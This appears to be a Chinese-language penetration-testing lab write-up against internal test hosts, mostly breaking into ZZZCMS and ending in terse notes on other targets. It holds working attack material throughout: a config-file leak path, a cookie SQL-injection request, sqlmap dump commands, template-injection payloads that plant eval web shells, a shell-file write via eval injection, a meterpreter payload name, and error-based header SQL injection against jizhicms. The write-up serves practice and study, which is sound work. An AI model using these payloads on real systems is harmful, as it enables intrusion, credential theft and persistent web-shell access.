image-20250414181411520

image-20250414183248548

第一天开环境的时候,不知道为什么,开完环境,啥也没有,果断一下分配的ip的端口,扫到两个,直接三板斧无果。

第二天又去开环境,开完有个cms,我勒个豆,感情昨天扫了俩小时,打歪了。

开局一个zzzcms

image-20250415163502978

开始搜索zzzcms历史漏洞,看了几个文章,发现很乱,不知道哪个可以。先找简单的试一下。

首先肯定是弱口令,试了几个无果,找个文章

https://www.cnblogs.com/0daybug/p/12565986.html,

image-20250415163743170

泄露config.php,/admin/?module=templateedit&type=/config/zzz_config.php

image-20250415163853515

有数据库账号密码,

image-20250415163912333

拿去连下,发现不行,做了限制,不允许的ip。这里也试了一下,不是admin的密码。那就只能换思路了。

又看到一篇大佬文章,https://www.laitimes.com/article/2t711_38slf.html,说存在注入,果断试一下。

1
2
3
4
5
6
7
8
GET /search/ HTTP/1.1
Host: 172.50.12.33
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5ij67devm1pd3ssb93g4um3fs4; zzz_adminpass=1;zzz_keys=0*
Connection: close

bp试一下

image-20250415164243491

时间是设置的二倍

image-20250415164142426

sqlmap直接跑,python3 .\sqlmap.py -r C:\Users\xin\Desktop\gggggg.txt --risk 3 --level 3 -D zzzcms -T zzz_u ser --dump

image-20250415164658134

admin,84c45962d887564f

image-20250415164730911

这种直接去百度搜就行,

image-20250415164749973

admin,admin123456

到这,我们可以登录了,相信大家已经看了一些文章说,admin的目录是admin+三位字符,这里靶机环境不是,就是admin。http://172.50.12.33/plugins/webuploader/js/webconfig.php

image-20250415164950751

这里可以看到,还得我还跑了一圈,没跑到。

image-20250415165042550

接下来就是后台了

根据这篇文章,https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/Zzzcms/Zzzcms%201.61%20%E5%90%8E%E5%8F%B0%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/

进行后台rce,

image-20250415170042733

登录进来,点上面模板管理,本地模板,找到电脑的,找到search.html,后面加一句。

{if:assert($_request[phpinfo()])}phpinfo();eva1($_POST['a']);{end if}

image-20250415170158388

http://172.50.12.33/search/,其实就是http://172.50.12.33/search/index.php

image-20250415170226485

{if:assert($_POST[x])}phpinfo();{end if}

image-20250416092837347

这样的话就连上来了。

image-20250416092820755

gears

python3 .\sqlmap.py -u “http://172.10.59.35/moduleinterface.php?mact=News,m_,default,0&m_idlist=a,b,c,1,2,3))*" –batch –level 5 –risk 3

pt-1

http://10.0.0.68/cslab/admin_notify.php

cslab cslab

notify1=1”;eval($_POST[a]);phpinfo();highlight_file(FILE);//&notify2=2&notify3=3

a=system('echo ^<?php @eval($_POST[cmd]);?^> > ./shell.txt');

a=copy(‘shell.txt’,’a.php’);

windows/x64/meterpreter/bind_tcp

image-20250428175114712

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /message/index.html HTTP/1.1
Host: 192.168.111.200
Content-Length: 45
Cache-Control: max-age=0
Origin: http://192.168.111.200
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.111.200/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=r1ttlpnb1h9aib0fnd8raq3fgj
cdn-src-ip: 2' and extractvalue(0x0a,concat(0x0a,(select user()))) and '1
Connection: close

tid=1&user=1&title=1&tel=13011111111&body=123


cdn-src-ip: 2' and extractvalue(0x0a,concat(0x0a,(select group_concat(schema_name)   from information_schema.schemata))) and '1
information_schema,jizhicms,jiz